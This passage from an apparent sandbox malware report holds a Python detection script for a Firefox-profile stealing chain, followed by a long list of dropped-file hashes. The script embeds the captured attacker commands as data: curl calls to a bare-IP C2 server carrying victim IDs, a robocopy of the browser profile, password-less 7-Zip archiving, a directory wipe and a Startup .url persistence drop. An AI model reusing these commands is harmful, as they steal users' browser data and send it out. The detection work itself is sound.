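indicators without interpreting them, because the report does not say what they mean.

```python
"""Triage of process-creation command lines for the collection and exfiltration
chain shown in this report (added example; not the sample's or the sandbox's
code). EVENTS is constructed from the captured command lines; its field names
are an assumption, not an EDR schema."""
import re
from urllib.parse import parse_qs, urlsplit

EVENTS = [  # one record per behaviour in the tree, PIDs as captured
    {"pid": 2796, "cmdline": r'curl -s -o "C:\Users\Admin\AppData\Local\temp\smoqi" "178.215.224.74/v10/ukyh.php?jspo=6"'},
    {"pid": 2072, "cmdline": r'robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock /XD storage'},
    {"pid": 4312, "cmdline": r'C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\3A78C5703B2D9750556C36A3F42A4C_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"'},
    {"pid": 3328, "cmdline": r'curl -s -o "C:\Users\Admin\AppData\Local\temp\hjnsq" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=9367d48999a86f6e28935bc65a369c9f*6&jwvs=3A78C5703B2D9750556C36A3F42A4C"'},
    {"pid": 3432, "cmdline": r'"C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"'},
    {"pid": 4964, "cmdline": r"REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps"},
    {"pid": 1952, "cmdline": r"reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript"},
    {"pid": 2564, "cmdline": r"SCHTASKS /QUERY /TN MyTasks\DolphinDumps"},
    {"pid": 1756, "cmdline": r'cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit'},
]

CURL = re.compile(r'curl\s+-s\s+-o\s+"([^"]+)"\s+"([^"]+)"', re.I)
BARE_IP = re.compile(r"^(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/")
TEMP_DROP = re.compile(r"\\AppData\\Local\\temp\\[a-z]{5}$", re.I)
ROBOCOPY = re.compile(r'robocopy\s+"([^"]+)"\s+"([^"]+)"', re.I)
BROWSER_DIR = re.compile(r"\\(Mozilla\\Firefox|Google\\Chrome\\User Data|Microsoft\\Edge\\User Data)$", re.I)
SEVENZIP = re.compile(r'7za?\.exe\s+a\s+"([^"]+)"(.*?)"([^"]+)"', re.I)
RD = re.compile(r'\brd\s+/s\s+/q\s+"([^"]+)"', re.I)
REG_QUERY = re.compile(r"reg\s+query\s+(\S+)\s+/v\s+(\S+)", re.I)
SCHTASKS = re.compile(r"schtasks\s+/query\s+/tn\s+(\S+)", re.I)
STARTUP_URL = re.compile(r'\[InternetShortcut\].*?>\s*"([^"]*\\Startup\\[^"]+\.url)".*?URL="([^"]+)"', re.I | re.S)


def _norm(path):
    return path.rstrip("\\").lower()


def triage(events):
    """Return (findings, iocs): findings is a list of (rule, pid) in event
    order; iocs collects the values worth pivoting on."""
    findings, staged = [], set()
    iocs = {k: set() for k in ("c2_hosts", "jwvs", "melq", "archives", "persistence", "startup_targets")}
    archived = wiped = False
    for ev in events:
        pid, cl = ev["pid"], ev["cmdline"]
        if m := CURL.search(cl):
            out_path, url = m.groups()
            ip = BARE_IP.match(url)
            if ip and TEMP_DROP.search(out_path):
                findings.append(("curl_silent_fetch_bare_ip_to_temp", pid))
                iocs["c2_hosts"].add(ip.group(1))
            # curl without a scheme defaults to http; split the query the same way
            q = parse_qs(urlsplit(url if "://" in url else "http://" + url).query, keep_blank_values=True)
            iocs["jwvs"].update(q.get("jwvs", []))
            iocs["melq"].update(q.get("melq", []))
        elif m := ROBOCOPY.search(cl):
            src, dst = m.groups()
            if BROWSER_DIR.search(src):
                findings.append(("browser_profile_staged", pid))
                staged.add(_norm(dst))
        elif m := SEVENZIP.search(cl):
            archive, switches, src = m.groups()
            if _norm(src) in staged:
                findings.append(("staging_dir_archived", pid))
                iocs["archives"].add(archive)
                archived = True
                # -mhe=on only does anything with a password; none is on this command line
                if "-mhe=on" in switches and not re.search(r"-p\S*", switches):
                    findings.append(("7z_mhe_without_p_switch", pid))
        elif m := RD.search(cl):
            if _norm(m.group(1)) in staged:
                findings.append(("staging_dir_wiped", pid))
                wiped = True
        elif m := REG_QUERY.search(cl):
            key, value = m.groups()
            if key.lower().endswith(r"\currentversion\run") or value.lower() == "userinitmprlogonscript":
                findings.append(("persistence_probe", pid))
                iocs["persistence"].add(key + "\\" + value)
        elif m := SCHTASKS.search(cl):
            findings.append(("persistence_probe", pid))
            iocs["persistence"].add("schtasks:" + m.group(1))
        elif m := STARTUP_URL.search(cl):
            findings.append(("startup_url_dropped", pid))
            iocs["startup_targets"].add(m.group(2))
    if staged and archived and wiped:
        findings.append(("browser_profile_theft_chain", None))
    return findings, iocs


if __name__ == "__main__":
    found, indicators = triage(EVENTS)
    for rule, pid in found:
        print(f"{rule:40s} pid={pid}")
    for name, values in indicators.items():
        print(name, sorted(values))
```

The chain rule fires only when the same directory is staged, archived and then wiped, which is what separates this behaviour from a legitimate robocopy backup; the individual rules still surface each step on its own so a partial run (for example the sample dying before the rd) is not silent.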
Downloads

Filesize 921KB
MD5     78ba0653a340bac5ff152b21a83626cc
SHA1    b12da9cb5d024555405040e65ad89d16ae749502
SHA256  05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
SHA512  efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

Filesize 546KB
MD5     7e6971c69a6ca7279da0e89b4b388189
SHA1    894fdd50dead4f46ac677ad06d1455943167ae1f
SHA256  1ae9c8851afa317293db0435ea27ad3fa8fda82a08209ee536ec947130e5c98c
SHA512  06296a0878df852fdd54fb31366d09c5c1984e1f6eaea22f1895d40a78d0ff07cf7a90bf1725becc630dbb33906d0764d6f314653c8f965ffdd91310c9699c0b

Filesize 82KB
MD5     c5c9551f30a44aab6152b932f7149053
SHA1    c5b31ed9091d873883a9ba4a1d19a1c8c50020f8
SHA256  ecc645d9ad7e7c4ad052e519f44d314ca15ce749fafd2be4384121704e1b26fd
SHA512  83dd79769dd3f0d0625742af94309fd5ded51615f9278cebb558e03777e5346baf08d3d6aa3c6c84df41a3e321bec83fad828c218e85f3e1d88276df17797e98

Filesize 75KB
MD5     d05e382bb4f1e9bb4bce6108e318ea6b
SHA1    ae0344388bc8d4e10a93c305c1f80bc60ab7bd7a
SHA256  ccd218caebb98be70e2caf40b17d54510571e48efa475cdce3c2f71581232a51
SHA512  742980e178aa801829c623ab9ff4d494d8555e2ef26542abdaf46b47fcf521ccf8dd7bf248ff98f1104a8fb18606c84bb4ca198df3ee28b96525bccae7a06d80

Filesize 67KB
MD5     fcc2e848da8d0beac27ba027ae23dc2a
SHA1    d4fae227cc35c806b7e06d85581fe7540ec4a9ca
SHA256  b2381bfddbbb5016607b0a66df94adc1b4552d6bb65682d492863c4e12a67e9b
SHA512  8c80def9f4b0c7f37aed52e7c2bc7602dc354cfefb0ca3e33704b07becb1ad3fe4828bf2f5c82ad000161dbc052e584105f305d67c1df5079d6e95b79e4f768f

Filesize 902KB
MD5     5e0a36a6a1e6ceb0bd42ed9debde8666
SHA1    6f0e0881b517206eaef33364ca40b006038b5fe2
SHA256  1fbe941b779b8ee4152e224fe6856364b5b67bb7ecef9f81ede5dd7441165a3b
SHA512  7946f6a25406a15d83bd6be6d0fa542a9d0b6c01515362fe8e318d5fce5fc792c08aa163042deaf2de88ea79431175fb14c503288c12daf6a971a9a8ddc9c80d

Filesize 50KB
MD5     7c7b509c91fd9da8ddfa9c3b5991c9eb
SHA1    61fb5cf74f58bde99c00a010e1a670beb85fd8ad
SHA256  c6e57103af0a2b2aca227a2b8683b6298711454a84ef57dc91fd35d279de9d64
SHA512  e56d32471a3c0b409a1b5a35065db89ace5f01928e915ab49a21242f74010c099f91f55272714f5f24c06824e5bbd0c4349de5bfdc6e385030defe0d726cd06a

Filesize 64KB
MD5     b6024d20dba6454f8e2df9086438fce7
SHA1    3edb339cc5960a05ab3d1ab615d4152b092ee832
SHA256  a87a9f1aee8317c1f3fd9c69ee65a569944618092cc1f6fbeb467ab2aa73cecf
SHA512  651e002fa45b48d51803fdd13ff379bf29937438df3a4001c7f935643ca1de4b5a2e4a4a376adf1b3c35b00ac1ed0856916b9d048a88a07a4d8bb989c4a62c56

Filesize 95KB
MD5     67498253ff01bc79ab26bdaa2183b367
SHA1    5c6efd758ab0b450c8a9ecaeb108e9272535a3b3
SHA256  60c91ae2bed2f72dda2ff6cb4deb1367a437df370be43bea1b7fdb58fd43fae8
SHA512  75fd5cf671a177d0c0ff18e2d088b1b6de0ef839cfd5ea410c4cfba65f26e2253983fb0ad7904cd4ba3f012b035a4682cc95ffbc35d96ad84c09ed2fc3cc19e8

Filesize 14KB
MD5     773bc1cb8deb9ff09bc892af84ae5681
SHA1    09f815af8eca0c373302204f58b47f591a300b7c
SHA256  f97765bb2d46f5755af315c71afeb50f52f282caee0a19b9f2644946a9308d42
SHA512  e05b77521bf5c51b60a0d7e9cdc8df2c06e3a065dc3afd42d34444484941b934e36e1ce4f80fb7a86d7c1bb8935abed9070672a02a4a3c12e22a17907b0c9223

Filesize 52KB
MD5     5ebe13d4704e614c4e597bed036a2591
SHA1    b6a40f939e04c997482307fb14126e716efafb2b
SHA256  3b65ae5300550700ece120dade16b6a47ceda16b437853eda1d5c4358d990712
SHA512  ee436b9624eb7eed3c4ae94637a9f13e53cd8da340aad4850cd9c8b8a7d98545623579cb34829ffe04904274033ae7f90f2d18f9dc1ecf260294c76cce943c36

Filesize 902KB
MD5     358194c0c510ff11f8f3d68afe5ea595
SHA1    e801c32a9b1414741a6fb2aec201d979ec927bbf
SHA256  cfb087fd56dd576f4f4db3b0930adf021950b20b65fe4c1527cb9a090e00565b
SHA512  8805cc8cb6eeb466afe5f5bea5baf3eeda3cf6f422cc761239c31656624472637d5d3a5ecfec45f134f620c34a674e8edd8b88ff36647ea4628bfcc7988fac86

Filesize 72KB
MD5     a57501ae52b7c24db316a678306f8083
SHA1    3cf2b2942943163781db70f6759153214fcd1c37
SHA256  8ea7d0e706039bd23733e77b84199102bcd4df8ece1e0c63daf55ed29749683c
SHA512  306de902e6f18b1acceb3bbac47b619bcd0f148a04fd634d13c0a9fdf57ec56edd688ffdd56ec6c827897209c3ffeeb362b2acfe9e1f2df348d7982e4c5626fc

Filesize 82KB
MD5     f8fef0dc6066b6bdae93db3c69368170
SHA1    e4d55d4c83b049968d5a6f4eee6ad9efe86dff79
SHA256  d945301adc544bc59bac06e95326eea938fc0e88a004bc36ab10e2eda222e374
SHA512  274311de8ddabaa6de2ad8f2266a6af3f2e306e488e272e3d6931c2edbc95437cfe0cd0f32e2818bf6daf30872d2ef1e610257f1ec85e20b7c4ba4d78d83a6c4

Filesize 82KB
MD5     ac10591abc6e8218601573329d394545
SHA1    7ad13438209ab213dabcc5274425a75c8bb63b27
SHA256  e720bcd9b3fb4cd02e1f7c16ccdbf9017e1231f390976c9bc6592e3e878f630a
SHA512  34fc9287c42fe1626dd1150e49d172166c4b9e47287bb2d56994ac5b1f237e938cb332f3e0b0c94408e2473aaf6b29f8e7731de9fbd9d636320fb7238a6b2a4d

Filesize 81KB
MD5     d1da7b87f186d2f06637fdb6851e4043
SHA1    d84cd866c1f50d57fca2a0000c9e5231229866d1
SHA256  b91ff890af60c6aad4bb50fb9ed5a8593a8ed0ff26568732a130bb4da22baf09
SHA512  697608d39b19c2b9a617102a74377a438bf1d53430dc09a225d98d59ab3a65b807e12f84d464f335190047624cddb1452088b89fed15bb667c875feaa8bed1f8

Filesize 1.1MB
MD5     b487b5b51436b42576d60a1fe58f8399
SHA1    4ff23fb37aaba96ac114fc54b397a902e4d9d650
SHA256  440fca4d671e78345ed1763f7904174effda3ecd567d7e20224e5910028b83c0
SHA512  de6974616095ecde0a222099d74fd08b307eb1213105053c14638a96fcb526c68fa53645d0b9359e1293b42af45b01226af7a373ac3a64709632c5d093c19ee5

Filesize 86KB
MD5     baca9a04dd19f20199c21c2ebf0374aa
SHA1    5df76c54fd5f02db7df46fb38ef41449430545d0
SHA256  4325fac47df15f794b41742445329e5028c09b85f56696b1b590b0e8c5fdec09
SHA512  39b10b8a6d9d55cacc30f8424e468f133eb599a29f1be3ce20563ddde0192fcdfae891beee9f64fef074a2d4113eea7f14bdbbcd662398f36cd8b5cb037c5973

Filesize 27KB
MD5     ea06d1bf2ac0ece898d348d4d0559255
SHA1    fc121d4832e0dcebed63e6af20d88b3d6406314c
SHA256  1ec9cc6b926282a80e3938d9a3dd0944cf79d1f3513b489b64ffdf1121e3595f
SHA512  9f65b3d381c992446e11749f498f3e37979b050a787d176f46b8158008f7cbde83c185133ee2f6deda8dec6a6c45548d6d91b419ffc4fa3dbf1a6d7d6233c3e4

Filesize 54KB
MD5     6f514c002da512210e64bb40b389938e
SHA1    2e18ff508f42efa8b771de5c6c4ab776b95f27e5
SHA256  f3612359dc4fcf6b5b1a1f7de8d01260b029fa5663decd830ea701f49d8f9254
SHA512  32b0420fb84921812b864367776fd8f8ebfa00799cb474673cda445448f7d60bbb43c2464622256b8ce5b45d58620e15c524b379914254c6a366896e5a9fe96e

Filesize 91KB
MD5     3ae881aae44c0d99645eccd7c0476de2
SHA1    d888f63971c106ea70c94742259e4b012352c189
SHA256  53ad1ed80d9a1c61242f88da71ce874e3f23dba723a8bcd311a9c5611d9e6824
SHA512  46f11524a3bf7a9df6e020c349c241cb23e33250ca05e8047d4d9555dbdfa9e008673961298e645b5b1a64635fef9f8c2dd938b5e4496305013d1436cdf32659

Filesize 18KB
MD5     1332165a90a96d564adbea76842051de
SHA1    6a99c791f8a492ecccf5ada0b77be493a61b1bc9
SHA256  e9edb0d724fc9f115572c847bc1d0c63b9a53d577771bd62384ba145ccc8ff36
SHA512  d6f3da7a6d6c1c8d6219a6c1512e693dbc9e06db9906d1a0e50da90971a13efdf26b413a713b46e71583b1878271ab8795e9aecf82a59359b5114248c4ef4bc6

Filesize 16KB
MD5     c93af8f0303e164aed3cc9322f159daa
SHA1    d187a11d000a1cf0fa59efb54f4ffc231f7bef06
SHA256  63d5678c4e49212e030896980b1ae1088198fdb582bedbf4518f2b4b650a5f0b
SHA512  5f8388c1aaa4a06ae1ceafc10e0e2c53fc62a41d2eace3afcb59f102440274395b7a6464cf739fcd8ae164145d3143f726c3d76b09a2a0ef3b30fab7014885a8

Filesize 92KB
MD5     a28ef671a2529783f795e0ce242b69a7
SHA1    3605589e946dcac4492b8a7799660ff4f1a323d1
SHA256  9d68a50b8498172bb2607b4652ed522d009e487cb0683c155805ef199274a745
SHA512  b67e45bda8d8733994f0eabeb454c5853ae5e6f06c7c49826b3995f23d2a5909ac0678f7e810dd7c78fbe3c25a46c996e1b55cc2f880aabcb343979b88448aa8

Filesize 26KB
MD5     cec47644f0f51a10cce5656a87673d71
SHA1    b7abebf08227a9860d7300128a9161841a4b191f
SHA256  34f31de17e65a33977c52d925c766af16d01e97ed9dd84f72048f1a9b5cb269e
SHA512  42ead80a00f47d02074b131e9b54037840ce182b963fe0b1a279d6a851fd300dd0be355503308ad489646e52f081fa46f76e76f915e01162b8b061764663c167

Filesize 18KB
MD5     26e155fc3ef2c17cd9e020224971d6b6
SHA1    b39303949cb9df0e79e7d379492ef985f9803bcd
SHA256  a587a7035e7ba1e0a687d365c7239724c2af5616826ee7cbe6b42c03ac89448b
SHA512  e7e19ff87e894d3eb0deb2a39c78e6c158350dd4e641a1ba7127ebc6120aed680ee86bfa06c448b6b640d3065ac5a5a4e7ae0ec7e7d97927c5256ba549230fd9

Filesize 8B
MD5     6e1571263e94c914fd16e33d548ac317
SHA1    637b78c843acb2108c62dffcee27a64cdd3cb343
SHA256  fc7aa783e72426a558bcfaf32fd92d91ce4aa4df8a4593a06c57c8bd595e27c5
SHA512  7fd3fb2a35f44b7d67b27793e9d7f06b73b931c89fd48295efab7ac434e999c4eeda87da1a9436b0858f2b4d762f23b47c153b4b5b11c98d04a50019c8c681cf

Filesize 32B
MD5     b65e9213dae00101a52d72b56120ff81
SHA1    d52caec94e56a19cca2bcc6e38dc780b1cb90027
SHA256  dfa7c49d13da53cc057bce84a0944d83258bf61671f92b2f7d0d9ee3e3896740
SHA512  09daf8969898babaaaa9ae8959b5345e204a27ff7b84f0bfb696b1e25130a9f659519a040eeaeae74c8c091586e76a6150743b30f419c0b1952c24c6c227584e

Filesize 104B
MD5     beaabaaf1170504de9cb53de6ea6c43d
SHA1    738af18491bdc5f5f8eb581abf32be11f7b4bea0
SHA256  b3f0913bfb1c486cd263bf9540d89da3345387eedd5ec82ac939592e212fad90
SHA512  4731e8a631796596e6da6a30b5fd7f0c5dd26c9e906c33a5f9b58c82eb4e53167d5e748d5ae263ec8317c659735c8c06df09540ab71952d0947fdff4ff6cfd0c

Filesize 8B
MD5     3b2371bbc8689d946964740c79e82336
SHA1    0647163247d0d1d86f4ea48661dfe8e4dc002767
SHA256  2e5dd8a4d8089153af4a49f65fb3d8c5763b95f59a3b78a91167d50402f42a4f
SHA512  84487aec0dd7060c262722c8454415243ed8888e117e2817442d064f0a0c841eeb1af7b1d699640ea6acf3015f20d022f78a59ddda71311859547d8a600556f5

Filesize 13B
MD5     17bcf11dc5f1fa6c48a1a856a72f1119
SHA1    873ec0cbd312762df3510b8cccf260dc0a23d709
SHA256  a7bf504871a46343c2feab9d923e01b9dca4e980b2e122ad55fd4dbb3f6c16d9
SHA512  9c12db4c6a105e767ff27048d2f8f19de5c9721ce6503dbb497aedcc1fc8b910a6fa43ec987fecd26794aff7440cb984744698fec5741dd73400a299dc3b2a25

Filesize 291KB
MD5     65e07a754effe6ec11638a25447289a5
SHA1    948cbf6b970ffb432d8ebb1d367cee5afa826a83
SHA256  995338989bbeb5f5304a6c1fc13d75580a26bed964cc9f930e6d6dbc59fa5fd5
SHA512  67f896fe0b1a4385119351bd41a5d62fef03f261a32e2b347de2f2e1475a482bd366bc9cffa26690ec8105db0bc60267df2397d6b7ec4a9ca7ee49819552cfb6

Filesize 4B
MD5     c00c81fedef0b80b43cc1db8de50c00c
SHA1    1ac21b1d5accb55cfa0abbbcf57f836aada49ee2
SHA256  a23c9f5563ad1c2019c59dde6eb4fa3442c0b5bbf83a279854a3ee3987c51e7b
SHA512  869551f28ffe1bb9ba906eaa94d9c54fd2197215510dbf5a4f053f71a45c189a570f27920ac3688862e21043854319718b6e028d25a4e453faad9770ede9c6d2

Filesize 30B
MD5     9b366ab497331d323faa5122fcef994a
SHA1    34e299517709fdad4043f66a8904bcadc034280b
SHA256  b115e6cad383c20d0424e148b378fbadfdf96a992d746f1dd11888f7582aa051
SHA512  9ef092da7cbc99e46a06747d8b82802378c45277cfee4ec8a71bedb3c6f74f49a904ad4f009475218e1ef28f4ca7d21e53c4f1d153ebd4ab58460812f34a74dc

Filesize 2.0MB
MD5     9faead3fd586f150c4d8bf862eae33a6
SHA1    d6fee79b329461541d4bf7639da5932a9afb7b10
SHA256  51d99751dd2134bb485247ef29d3bb6c5b48ed08f61b2eb41f12e7e41638d8c1
SHA512  6b87f37253606b06cd9a244bb74318b95ce8719caa5623ef10b8c26c01529c60b917a76fc56ccf70275f40290993dec1d56284b39fe91910a9726a39df790269

Filesize 40B
MD5     d68110f2209ca9d816d2d9a9cb43c99a
SHA1    e88290a0c1073bb2def1db484542c3185ff4c214
SHA256  2c0825f4f2f074ada99512585846ef1ee3ce259c48ddb7882a8bbe80342e67af
SHA512  3ec77a1c042f693d8fb0776cd526cb8a7777b4d705165ed918fb9eb6151c64365ebc7aa7e7fd3194838be02d960d8e95be04be4c9edabddc877b90f8778b87a8

Filesize 76B
MD5     7ec936af6bbf93cfd08de32eb291263d
SHA1    6216fc54e2b9ebdb416331aa344540846840f410
SHA256  bfab8d48cec02a93fec9bf66aa8cefe0d02ec305fd335bbbacbe61f996990b26
SHA512  f44c298e6aad646614c14260052d7327e0b1db33f1212df33f401179dc2ead348312d9006c635ee71346ffb3ba692dd829941a9ac894c43ee3be4c805dd8ad9e

Filesize 1.7MB
MD5     2eaae68ca44390605379c1973a83c343
SHA1    4ce10b0c2717a631a53aca5e9daa7b0bf823c2e6
SHA256  1c8097e10cd7b6189a5e13e3b730e5e859675604eb8c459d7f7314d434cb9d8d
SHA512  cf365b466c2d8073b9df3495428a8e0183bec2d623372d4cfdfe58144e91b972c725b2c3430bc0d904d7cdd5e21c13f32af9b2148e6ed5da2ee9ff25994ea929

Filesize 138B
MD5     de7a7127a01956f6d0058d8a07062ead
SHA1    eb9125792d2dbd552edb9d5dc5751a85c8f82c7e
SHA256  36f6e8e860229e681ab960e7a5b979f64769058e981c18d8fe02204e39c3c333
SHA512  570a9245a1f874cc1ba144f6567222c724e7957865456b911552673fcf5c5910215df5c9490c831a9ef63ed1a947bb37ae881d5220ad20f9ebf2203f07018550

Filesize 164KB
MD5     75375c22c72f1beb76bea39c22a1ed68
SHA1    e1652b058195db3f5f754b7ab430652ae04a50b8
SHA256  8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a
SHA512  1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

Filesize 996KB
MD5     9e73fb50d37e37ee8bd19a8e3d2b82ca
SHA1    3db1c548e86e4bb7457324a3097b05da15b7ffc3
SHA256  68ba7122ee8d9ce34ed94b6036a171ce38d6d9d9b3a609c2f4de773f4dd40d5c
SHA512  b41209300f018103b0f8a4de0537f348a3bdfcbc8feb19e7fec6634b06c266cc442145fd2d9230f827f273b0d07bb6bbcab7a0f0e9e1f558e6dd7a076f568094

C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\Profiles\yuzka873.default-release\webappsstore.sqlite-shm
Filesize32KB
MD5b7c14ec6110fa820ca6b65f5aec85911
SHA1608eeb7488042453c9ca40f7e1398fc1a270f3f4
SHA256fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb
SHA512d8d75760f29b1e27ac9430bc4f4ffcec39f1590be5aef2bfb5a535850302e067c288ef59cf3b2c5751009a22a6957733f9f80fa18f2b0d33d90c068a3f08f3b0